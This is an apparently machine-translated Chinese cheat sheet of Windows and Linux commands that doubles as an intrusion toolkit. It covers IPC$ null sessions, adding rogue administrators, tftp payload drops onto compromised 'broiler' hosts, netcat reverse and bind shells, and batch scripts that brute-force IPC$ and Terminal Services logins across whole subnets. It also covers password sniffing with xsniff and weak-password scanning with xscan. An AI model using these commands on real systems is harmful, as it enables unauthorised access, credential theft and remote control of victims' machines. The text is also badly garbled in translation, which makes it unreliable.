net use 命令集合详解()

Net使用命令和dos常用命令汇总，学习dos朋友必备知识。只有这样才能有助于批量技术的组合应用。

Net use ipipc$ /user: 建立ipc空链接net use IP IPC $ password /user:用户名建立IPC非空链接net use h: ipc$ password /user:用户名直接登录后将对方C:映射到。

H: net use h: ipc$登录后，将对方C:映射到H:net use IP Ipc $/del delete Ipc link net use H:/del delete mapping net user username password/add建立用户net user guest/Active:yes激活guest user net user以查看哪些用户net user account name查看account net local group administrator s username的属性/将“user”添加到administrator以使其

有管理员权限，注意：在administrator后面加s，用复数net start检查哪些服务是打开的。net start服务名打开服务；(例如，net start telnet、net start schedule) net stop服务名称停止服务net时间目标ip检查对方的时间net时间目标ip /set将本地计算机时间设置为与“目标ip”主机的时间同步，并添加

参数/yes可以取消确认消息net view查看本地局域网打开了哪些共享net view 查看对方局域网打开了哪些共享。网络配置显示系统网络设置。网络注销断开共享。网络暂停服务名称暂停服务。NetSend ip“文本消息”向另一方发送消息。net ver LAN正在使用网络连接类型和信息。净份额检查本地开放的份额。net Share IPC $ Open IPC $ Share net Share IPC $/Del Delete IPC $ Share net Share C $/Del C:Share net user guest 12345。以来宾用户身份登录后，将密码更改为12345网络密码。更改系统登录密码netstat -a查看哪些端口是打开的，常用netstat -an netstat -n检查端口的网络连接。常用的netstat -an netstat -v来检查正在进行的工作netstat -p协议名称示例：netstat -p tcq/ip来检查协议的使用情况(检查tcp/ip

协议使用情况)netstat -s检查所有正在使用的协议的使用情况。如果对方136到139有一个端口是开着的，可以查看对方最近一次登录。

用户名(03前的用户名)-注意：参数-A要大写tracert-参数ip(或计算机名)跟踪路由(数据包)，参数：“-w号”用于设置

设置超时间隔。Ping ip(或域名)向另一台主机发送默认大小为32字节的数据，带有参数："-l[空格]

数据包大小“；”-n次发送数据“；”-t”的意思是一直ping。Ping -t -l 65550 ip Ping of death(发送大于64K的文件，一直ping就成了death。

Ping) ipconfig (winipcfg)用于windows NT和XP(windows 95 98)检查本地ip地址，

Ipconfig可以使用参数“/all”来显示所有配置信息。tlist -t以树形列表显示进程(是系统的附加工具，默认不安装，正在安装。

Support/tools文件夹下的目录)kill -F进程名加-F参数强制结束一个进程(作为系统的附加工具，默认为无安全。

，在安装目录的Support/tools文件夹下)del -F文件名加-F参数可以删除只读文件，/AR，/AH，/AS和/AA分别表示删除。

只读、隐藏、系统、存档文件、/A-R、/A-H、/A-S、/A-A表示删除除只读和隐藏文件以外的文件。

文件、系统和档案以外的文件。例如，“DEL/AR *。* "表示删除当前目录中的所有只读文本。

，“DEL/A-S *。* "表示删除当前目录中除系统文件以外的所有文件。

删除/S /Q目录或使用：rmdir /s /Q directory /S删除该目录及其所有子目录，并

文件。同时，当使用参数/Q取消删除操作时，系统会直接确认删除。(做了两个订单。

使用相同的)移动字母路径文件名移动后存储被移动文件的路径文件名移动文件。

，用参数/y，会取消确认移动目录中存在相同文件的提示，直接覆盖fc one.txt two.txt 3st.txt。比较这两个文件，并将差异输出到3st.txt文件。

、“”和“”是位于id号的重定向命令，用于在/delete处打开已注册的计划任务以停止所有计划任务，并带有参数/yes以在id号处停止/delete以在ip时间检查所有计划任务时停止已注册的计划任务程序名称(或命令)/r在某个时间运行另一个程序并重新开始计算。

机器手指username @host查看最近有哪些用户登录了远离登录服务器的telnet ip端口，默认端口为23 open ip connected to IP(这是telnet登录后的命令)。通过在这台机器上直接键入telnet，telnet将输入这台机器的telnet副本路径文件名1路径文件名2 /y。将文件1作为文件2复制到指定目录，并使用参数

/y同时，取消您要覆盖现有目录文件副本c: SRV . exe IP admin的确认。将本地的c:srv.exe复制到对方的admin。CPPY 1st.jpg/b 2st.txt/a 3st.jpg隐藏的2st.txt的内容在1st.jpg生成它。

3st.jpg的新文件，注意：2st.txt文件头要有三个空行，参数：/b指二进制文件，/a指。

ASCLL格式文件copy IP admin $ svv . exe c: or:copy IP admin $ *。*复制另一个admini$共享

下srv.exe文件(所有文件)到本地c: xcopy复制文件或目录树目标地址目录名用参数/y复制文件和目录树

不会提示你覆盖同一个文件tftp -i自己的IP(这是以肉机为跳板时的肉机IP)获取server.exe C: server.exe。

登录后，将“IP”的server.exe下载到目标主机c:server.exe参数：-i指两个。

进入传输模式，如传输exe文件，如果不加-i，在ASCII模式(传输文本文件模式

类型)要传输tftp -i IP put c:server.exe登录后，将本地c:server.exe上传到主机ftp ip端口，用于上传文件到服务器或文件操作。默认端口是21。斌指的是两个

系统传输(可执行文件)；路由打印默认显示ASCII格式文本文件传输时的IP路由，主要会显示网络地址和子网掩码。

网络掩码、网关地址、接口地址查看和处理ARP缓存。ARP表示名称解析，负责将IP解析为物理IP。

性的MAC地址。Arp -a将显示所有信息。启动程序名或命令/max或/min。打开一个新窗口，最大化(最小化)某个进程。

或命令mem查看cpu使用率attrib文件名(目录名)查看文件属性(目录)attrib文件名-A -R -S -H或A R S H删除(添加)文件归档文件，只读。

，系统，隐藏属性；使用+添加要作为属性目录查看的文件。参数：/Q显示文件和目录属于系统的哪个用户，/T:C显示文件是何时创建的。

，/T:A显示文件的上次访问时间，/T:W上次修改时间date /t，time /t使用此参数，即" DATE/T "和" TIME/T "，只有当前日期和

时间，而不是输入新的日期和时间。set指定环境变量的名称=要分配给变量的字符。设置环境变量以显示所有当前环境变量。set p(或其他字符)显示以字符p(或其他字符)开头的所有当前环境变量。暂停暂停批处理程序，并显示：请按任意键继续.if在批处理程序中执行条件处理(有关更多说明，请参见if命令和变量)。goto标签将cmd.exe引导至批处理程序中的标记行(标签必须是单独的一行，并标记有

以冒号开头，例如：“:start”标签)调用路径批处理文件名从一个批处理程序调用另一个批处理程序(有关更多说明，请参见

打电话/？)要对一组文件中的每个文件执行特定命令(有关更多说明，请参见命令和变量),请打开或关闭echo要打开或关闭echo，请仅使用不带参数的echo来显示当前的echo设置。回声信息显示在屏幕上。pass.txt将“信息”保存到pass.txt文件中。findstr Hello aa.txt在aa.txt文件中查找字符串hello find文件名。查找文件的标题名。更改cmd窗口的标题名称。颜色颜色值设置CMD控制台的前景色和背景色。0=黑色，1=蓝色，2=绿色，3=浅绿色。

4=红色，5=紫色，6=黄色，7=白色，8=灰色，9=浅蓝色，a=浅绿色，B=浅绿色，C=浅红色，

D=淡紫色，E=淡黄，F=亮白色。提示名称改变显示的命令提示cmd.exe(改变C:，D:到：EntSky)打印文件名打印一个文本文件。

在Verdos窗口下显示版本信息。winver弹出一个窗口显示版本信息(内存大小，系统版本，补丁版本，计算机名称

)format letter /FS: type格式化磁盘，类型：FAT，FAT32，NTFS，例如：format d:

/FS:NTFS md目录名创建目录替换源文件目录替换文件ren原始文件名新文件名重命名文件名树以树结构显示目录，使用参数-f，将列出第一个文件夹中的文件名。键入文件名显示文本文件的内容。更多文件名逐屏显示输出文件doskey。要锁定的命令=要解锁的字符DOS key=为DOS提供的锁定命令(编辑命令行，再次调用win2k命令，

并创建宏)。比如：lock dir命令：doskey dir=entsky (doskeydir=dir不能用)；

Unlock: doskey dir=taskmgr调用任务管理器chkdsk /F D:检查磁盘D，显示状态报告；添加参数/f并修复磁盘上的错误。tlntadmn telnt服务admn，键入tlntadmn选择3，然后选择8，就可以更改telnet服务了。

默认端口23为任何其他端口exit，用于退出cmd.exe程序，或者目前使用参数/B退出当前批处理脚本，而不是使用cmd.exe路径PATH 可执行文件的文件名来设置可执行文件的路径。Cmd启动win2K命令解释窗口。参数：/eff，/en关闭和打开命令扩展。更窝

见cmd/？详情请见。regedit /s注册表文件名被导入注册表中；参数/S是指安静模式导入，没有任何提示；Regedit /e注册表文件名导出注册表cacls文件名参数显示或修改文件访问控制列表(ACL) -针对NTFS格式时。参数：/D username:设置为拒绝用户访问；/P username erm替换指定用户的访问权限。

权威；/G用户名erm给指定的用户访问权限；烫发可以是：n无，r读，

写，c改(写)，f完全控制；示例：cacls D:test.txt /D发布设置

D:test.txt拒绝pub用户的访问。Cacls文件名查看文件REM文本内容的访问用户权限列表向批处理文件netsh视图添加注释或更改本地网络配置

IIS服务命令：iisreset /reboot重启win2k电脑(但是有系统重启的提示)。iisreset /start或stop可启动(停止)所有互联网服务。iisreset /restart停止并重新启动所有Internet服务。iisreset/Status显示所有Internet服务的状态。iisreset /enable或disable启用(禁用)在本地系统上重新启动Internet服务。

当启动、停止或重新启动互联网服务时，如果发生错误

将错误地重新启动iisreset /noforce。如果无法停止互联网服务，则不会强制终止互联网服务。达到超时(秒)时，iisreset /timeout Val没有停止Internet服务。如果指定

/rebootonerror参数，计算机将重新启动。默认是重启20秒，停止60秒。

，重新启动0秒。命令：ftp(后面会给出详细内容)FTP的命令行格式是：FTP-V-D-I-N-G [hostname]-V显示远程服务器的所有响应信息。-d使用调试模式。-n限制ftp自动登录，即不使用。netrc文件。-g取消全局文件名。帮助[命令]还是？[Command]检查命令描述。bye或quit终止主机FTP进程并退出FTP管理模式。pwd列出当前远程主机目录put或send本地文件名[上传到主机的文件名]并将本地文件发送到远程端。

主机中的Get或recv[远程主机文件名][本地下载的文件名]从远程主机传输到

本地主机中的mget [remote-files]从远程主机接收一批文件到本地主机mput local-files将一批文件从本地主机传输到远程主机dir或ls[remote-directory][local-files]列出当前远程主机目录中的文件。

如果有本地文件，则将结果写入本地文件。ascii设置以ASCII(默认值)bin格式发送文件，或者图像设置以二进制格式发送文件。bell每次发送文件时提示cdup返回上一个目录关闭中断与远程服务器的ftp会话(对应打开)打开主机[port]建立与指定ftp服务器的连接，可以指定连接端口删除删除文件mdelet[remote-files]在远程主机中删除一批文件mkdir directory-name建立目录重命名[from] [to]在远程主机中。更改远程主机中的文件名rmdir directory-name，删除远程主机中的目录状态，显示FTP的当前状态，显示远程主机的系统类型，user user-name[password][account]，用另一个用户名登录远程主机open host [port]。重新建立新的连接提示交互提示模式macdef定义宏命令lcd改变当前本地主机的工作目录。如果是默认设置，请转到当前用户的主目录chmod来更改远程主机的文件权限。当case打开时，使用MGET命令将文件名复制到本地机器，所有文件名都转换成小写字母cd remote-dir进入远程主机目录cdup进入远程主机目录的父目录！在本地机器中执行交互式shell，并退出回到ftp环境，例如！ls*。活力

命令：MYSQL-h主机地址-u用户名-p密码连接MYSQL；如果MYSQL刚刚安装，超级用户

Root没有密码。(例：MySQL-h 110 . 110 . 110 . 110-uroot-p 123456注：u和root不需要加空格，其他也一样)退出MySQL admin-u username-p旧密码密码新密码更改密码grant select on database。*以“密码”标识的用户名@登录主机；提高

添加新用户。(注意：和上面不一样，后面的命令都是因为是MYSQL环境下的命令。

以分号作为命令终止符)显示数据库；显示数据库列表。一开始只有两个数据库：mysql和test。

Mysql库很重要。它包含MYSQL系统信息。我们更改密码并添加新用户，这实际上是

使用此库进行操作。使用mysql显示表格；显示描述库中数据表的表名；展示数据表的结构：创建数据库库名：构建库使用库名；创建表名(字段设置列表)；设置表名下拉数据库库；删除表名；删除库和删除表从表名中删除；清除select * from表名中的记录；显示的表中的记录MySQL dump-opt school . BBB备份数据库：(命令在DOS的mysqlbin中

目录执行)；注意：将数据库school备份到school.bbb文件，这是一个

接受任何文本和文件名。打开它，你会发现新的东西。win2003系统下的新命令(实用部分):shut down参数关闭或重启本地或远程主机。参数描述：/S关闭主机，/R重新启动主机，/T数字设置延迟时间，范围从0到180。

秒，/A取消启动，/M //IP指定远程主机。示例：shutdown /r /t 0立即重新启动本地主机(没有延迟)。task ill/参数进程名称或进程的pid终止一个或多个任务和进程。参数说明：/pid要终止一个进程的pid，可以使用tasklist命令获取每个进程的pid。/IM想要

终止进程的进程名，/F强制终止进程，/T终止指定的进程及其启动的子进程。

程。任务显示当前在本地和远程主机上运行的进程、服务和服务进程的进程标记。

识别符号(PID)。参数说明：/M列出当前进程加载的dll文件，/SVC显示每个进程对应的服务。

如果没有参数，将只列出当前进程。

Linux系统下的基本命令：uname显示版本信息区分大小写(与win2K的Ver相同)。Dir显示当前目录文件，ls -al显示包含隐藏文件(与win2K的Dir相同)。PWD查询当前目录位置光盘光盘.回到上一个目录，注意cd和之间有一个空格.CD/返回到根目录。卡特彼勒文件名查看文件内容卡特彼勒abc.txt将内容写入abc.txt文件。更多文件名逐页显示文本文件。复制cp文件mv移动文件rm文件名删除文件，rm -a目录名删除目录和子目录mkdir目录名创建目录rmdir删除子目录，目录中没有文档。Chmod设置文件或目录的访问权限。grep在文件中搜索字符串diff file file comparison find file搜索当前日期、时间查询当前与您使用同一台机器的人以及登录时间和地点W查询当前计算机用户的详细信息whoami检查他的帐户名groups检查某人的组passwd更改密码历史记录检查他自己的订单ps显示进程状态kill停止一个进程gcc黑客通常用它来编译C语言。写文件su的权限转换为指定用户telnet IP telnet连接到另一台主机(与win2K相同)。当bash$出现时，连接成功。Ftp ftp连接到服务器(与win2K相同)

附：批处理命令和变量

1:FOR命令和变量的基本格式：FOR/parameters%变量in(set)do command[command _ parameters]%变量：

指定一个单字母的可替换参数，如：%i，并用：%%i指定一个变量，并调用

使用变量时：%i%，变量区分大小写(%i不等于%i)。从%0到% 9的每个批处理中可以处理10个变量，其中% 0默认用作批处理文件名。%1

默认情况下，这是使用该批次时输入的第一个值。同样，%2-%9是指输入的第2-9个值。例子

:netuse ip IPC $ pass/user: IP是%1，pass是% 2，user是%3。

(set):指定一个文件或一组文件，并使用通配符，例如：(D:user.txt)和(1 1 254)(1

-1 254)，{”(1 1 254)“第一个‘1’指初始值，第二个‘1’指增量，第三个‘254’

指最终值，即从1到254；(1 -1 254)的描述：即从254到1

命令：指定要对文件执行的命令，如net use命令；如果要执行多个命令

，使用以下命令命令此房间：分隔command_parameters:为特定命令指定参数或命令行开关。

IN (set):指(set)中的值；DO命令：指执行命令

参数：/L是指增量形式{当(set)是增量形式}时；/F表示从文件中连续获取值，直到获取为止。

直到{(set)是一个文件，比如(d:pass.txt)}。用法示例：@echo off echo用法格式：test.bat *。*.*测试. txt

对于(1 1 254)中的/L %%G，请回显%1。%%G test.txt net use %1。%%G

/user:administrator | find command successfully completed test . txt另存为test.bat描述：依次尝试为指定的C类网段的254个IP地址建立administrator。

IPC$使用空密码连接，如果成功，将IP存储在test.txt中

/L表示增量形式(即从1-254或254-1)；输入IP的前三位数字：*。*.*作为批处理默认值。

第% 1个，共个；%%G是变量(ip的最后一位)；用于分隔echo和net use命令；

|表示ipc$建立后，在结果中使用find查看是否有‘命令成功完成’信息；%1.%%G是

完整的IP地址；(1 1 254)是指起始值、递增量和结束值。@echo off echo用法格式：ok . bat IP for/f % % I in(d:user.dic)do SMB . exe % 1% % I d:pass.dic 200另存为：ok.exe说明：输入一个IP后，用字典文件d: pass . DIC来消歧d: user . DIC

直到文件中的值结束。%%i是用户名；%1是输入的IP地址(默认

)。

2.if命令和变量的基本格式：IF [not] errorlevel数字命令语句，程序运行的话，最后会返回一个等于或大于一个手指的。

设置号码的退出码，指定条件为“真”。示例：IF errorlevel 0命令是指程序执行后返回值为0时，值行后的命令；

如果非错误级别1命令意味着如果程序执行返回的值不等于1，将执行下面的命令。0表示发现并成功执行(真)；1表示没有发现或执行(假)。IF [not] string 1==string 2命令语句如果指定的文本字符串匹配(即string

1等于字符串2)，下面的命令将被执行。示例：“if %2%==4 goto start”表示：如果输入的第二个变量是4，则执行以下内容

Command(注意：% variable name%并在调用变量时添加 )IF [not] exist文件名command语句如果指定的文件名存在，将执行下面的命令。例如：“如果不是nc.exe goto end”的意思是：如果没有找到nc.exe文件，跳转到:结束标记。

签名。IF [not] errorlevel数字命令语句else命令语句或if [not] string 1==word

字符串2命令语句else命令语句或IF [not] exist文件名命令语句else命令

Add: else命令：在语句之后，当前面的条件不成立时，指的是else之后的生活。

秩序。注意：else必须在同一行上才有效。当有del命令时，你需要把所有的del命令

将内容括起来，因为del命令只能在单行上执行，使用后相当于一个人。

好吧。示例：“if exist test.txt. else echo”

Test.txt.missing "，注意了"。“在下命令。

(II)系统外部命令(需要下载所有相关工具):

1.瑞士军刀：nc.exe

参数描述：-h检查帮助信息-d后台模式-e prog程序重定向，执行【危险】一次连接-I secs delay的间隔-l监控模式，用于入站连接-L监控模式，连接关闭后继续监控直到CTR C -n IP地址。不能用域名-o膜记录十六进制传输-p[ space] port本地端口号-r随机本地和远程端口-t使用Telnet交互模式-u UDP模式-v详细输出，使用-vv更详细-w数字超时延时间隔-z将输入，输出关闭(用于锚扫描时)基本用法：nc -nvv 192.168.0.1 80连接192.168.0.1主机的80口nc -l -p 80，NC-L-p 5354-T-E C:winntsystem32cmd.exe在

远程的TCP 5354端口NC-t-e c:winntsystem32cmd.exe 192 . 168 . 0 . 2 5354确定远程主机的

Cmdshell并反接192.168.0.2的5354端口。高级用法：nc -L -p 80作为蜜罐使用1:打开并持续监听端口80直到CTR C. nc -L -p 80 c:log.txt作为蜜罐使用2:打开并持续监听端口80直到

CTR C，并将结果输出到C: log . txt NC-L-P 80 C: honey port . txt作为蜜罐用3-1:打开并不断监听端口80，

直到CTR C，并将c:honeyport.txt的内容发送到管道中，也可以起到传输文件的作用。type.exe C: honey port | NC-L-P 80作为蜜罐用3-2:打开不断监听80终端。

端口，高达CTR C，并将c:honeyport.txt中的内容发送到管道中，也可以起到传输文件的作用：对方主机上使用nc -l -p本地端口：NC-E cmd.exe本地IP -p本地端口*win2K nc -e /bin/sh本地IP -p本地端口*linux，unix反向连接突破对方主机的防火。

在壁机上，使用nc -d -l -p本地端口要传输的文件的路径和名称；在另一台主机上，使用nc -vv本地IP的本地端口中存储的文件的路径和名称来传输文件。

其他主机注意：|管道命令或重定向命令。""，例如：tlntadmn test.txt是指test.txt的内容

分配tlntadmn命令@表示在@后执行命令，但不会显示(后台执行)；例如：@ @dir c:winnt

D:log.txt的意思是：后台执行dir，结果保存在D: log.txt中，“”和“的区别是：覆盖；”表示：保存到(添加到)。例如分别为@dir c:winnt d:log.txt和@dir c:winnt d:log.txt

执行第二次比较：保存第二次结果，而第二次结果只是第一次结果。

，因为第二次的结果覆盖了第一次。

2.扫锚工具：xscan.exe

基本格式xscan -host start IP[- end IP]检测项[其他选项]扫描锚点 start IP to end

IP 段所有主机信息xscan -file主机列表文件名检测项[其他选项]扫描锚主机IP列表文件

名称中的所有主机信息检测项-主机存活的主动检测-远程操作系统类型的os检测(通过NETBIOS和SNMP协议) -常用服务的端口状态的端口检测-ftp检测ftp弱密码-pub检测FTP服务匿名用户写权限-pop3检测pop 3-服务器弱密码-smtp检测SM TP-服务器漏洞-sql检测SQL-服务器弱密码-smb检测NT-服务器弱密码-iis检测iis编码/解码漏洞-cgi检测cgi漏洞-nasl加载Nessus攻击脚本-以上所有项目的全部检测其他选项-i适配器号设置网络适配器、可以通过-l 参数获得适配器号-l显示所有网络适配器-v显示详细的扫描进度-p跳过没有响应的主机-o跳过没有检测到开放端口的主机-t并发线程数，并发主机数指定最大并发线程数和并发主机数，静默

识别100，10 -log文件名的数量，以指定扫描报告的文件名(后缀为：TXT或HTML文件)。使用示例xscan-主机192 . 168 . 1 . 1-192 . 168 . 255 . 255-全活动-p检测

192.168.1.1-192.168.255.255网段内主机的所有漏洞，跳过检测无响应主机xscan-host 192 . 168 . 1 . 1-192 . 168 . 255 . 255-port-sm b-T150-o。

92.168.1.1-192.168.255.255网段中主机的标准端口状态，nt弱密码用户，最大

并发线程的数量是150。跳过未检测到开放端口的主机xscan-file hostlist . txt-port-CGI-t200。5-V-O检测到“hostlist.txt”

文件CGI漏洞中列出的所有主机的标准端口状态，最大并发线程数为200，与

一次最多检测5台主机，显示详细的检测进度，并跳过未检测到开放端口的主机。

3.命令行嗅探器：xsniff.exe可以捕获FTP/SMTP/pop 3/HTTP协议密码参数描述-tcp传出tcp数据报-udp传出udp数据报-icmp传出icmp数据报-传递过滤密码信息-隐藏后台运行-主机解析主机名-地址IP地址过滤IP地址-端口端口过滤端口-日志文件名保存输出到文件-asc带SCII格式输出-十六进制格式输出用法示例xsniff . exe-pass-hide-log pass . log在后台运行嗅探密码并将密码信息保存在

pass.log文件中的xsniff . exe-tcp-UDP-ASC-addr 192.168.1.1嗅探192 . 168 . 1 . 1并过滤TCP和

Udp信息并以ASCII格式输出。

4.终端服务密码破解：tscrack.exe

参数描述-h显示帮助-v显示版本信息-s在屏幕上显示解密能力-b密码错误时发出的声音-t与发送多个连接(多线程)相同-n阻止目标服务器上的系统日志条目-u卸载删除tscrack组件-f使用密码后-F-f间隔(频率)-l使用用户名后-w使用-w密码字典后-p使用-p密码后-D登录主页使用示例ts crack 192 . 168 . 0 . 1-l administrator-wpass . DIC远程密码字典文件突发

主机管理员tscrack 192 . 168 . 0 . 1-l administrator-p 123456的登录密码为123456远程登录。

192.168.0.1的管理员用户@ ifnotexistipscan . txt gotonoscan @ for/f tokens=1 delims= % % I in(3389 . txt)do hack . bat % % I nscan @ echo 3389 . txt无查找或扫描失败(另存为3389.bat)(假设有多位3389的车主被SuperScan或其他锚点扫地机扫描，

IP列表文件3389.txt) 3389.bat的意思是：从3389.txt文件中取一个IP，然后运行hack . bat @ ifnotexist tscrack.exe gotonoscan @ ts crack % 1-l administrator-wpass . dicrouji . txt:no scan @ echo tscrack.exe no find或scan失败。(保存为hack.bat)(运行3389.bat就可以了，还有3389.bat，hack.bat，3389.txt，

Pass.dic和tscrack.exe在同一个目录下；你可以等结果。)hack.bat的意思是：运行tscrack.exe，使用字典暴露3389.txt中的所有主机

管理员密码，并将破解结果保存在rouji.txt文件中。

5.其他：

Shutdown.exe关机 IP地址T: 20会在20秒后自动关闭对方NT(Windows 2003系统自带工具

，在Windows2000下，你得下载这个工具才能使用。在之前的Windows 2003 DOS命令中

有详细的介绍。)fpipe.exe(TCP端口重定向工具)在第二篇文章(端口重定向绕过防火

墙)FPIPE-L 80-S 1029-R 80[URL]www.sina.com.cn[/URL]有人扫锚你的端口80，他就扫

结果会是[url]www.sina.com.cn[/url]的主机信息。Fpipe -l 23 -s 88 -r 23目标IP从本地计算机通过终端向目标IP发送23端口Telnet请求。

端口重定向后，通过端口88发送到目标IP的端口23。(使用目标IP建立Telnet。

机器使用的88端口连接到它)然后：Telnet 127.0.0.1(本地IP)直接连接到

目标IP的端口23。Opentelnet.exe(远程打开Telnet工具)opentelnet.exe IP账号密码ntlm认证Telnet端口(无需上传

Ntlm.exe破坏了微软的认证方法)。直接远程开通对方telnet服务后即可使用。